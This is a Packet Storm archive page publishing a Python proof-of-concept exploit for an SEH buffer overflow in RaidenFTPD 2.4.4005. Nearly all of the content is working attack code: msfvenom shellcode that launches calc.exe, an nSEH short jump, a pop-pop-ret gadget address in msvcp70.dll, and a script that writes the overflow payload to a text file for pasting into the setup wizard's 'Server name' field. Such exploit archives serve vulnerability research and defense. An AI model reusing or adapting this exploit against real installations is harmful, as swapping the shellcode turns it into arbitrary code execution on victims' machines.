what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

RaidenFTPD 2.4.4005 Buffer Overflow

RaidenFTPD 2.4.4005 Buffer Overflow
Posted Jul 21, 2023
Authored by Andre Nogueira

RaidenFTPD version 2.4.4005 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | f7006f68a996adfe3729742a90344416a07faad59a66a5792dd7165b9e377c16

RaidenFTPD 2.4.4005 Buffer Overflow

Change Mirror Download
# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045

# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe


#!/usr/bin/env python3
from struct import pack

crash = 2000
offset = 497

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d"
shellcode = b"\x90" * 8
shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"

nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes
SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll

buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode
buffer += b"D" * (crash -len(buffer))

file_payload = open("exploit-raiden.txt", 'wb')
print("[*] Creating the .txt file for out payload")
file_payload.write(buffer)
print("[*] Writing malicious payload to the .txt file")
file_payload.close()


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close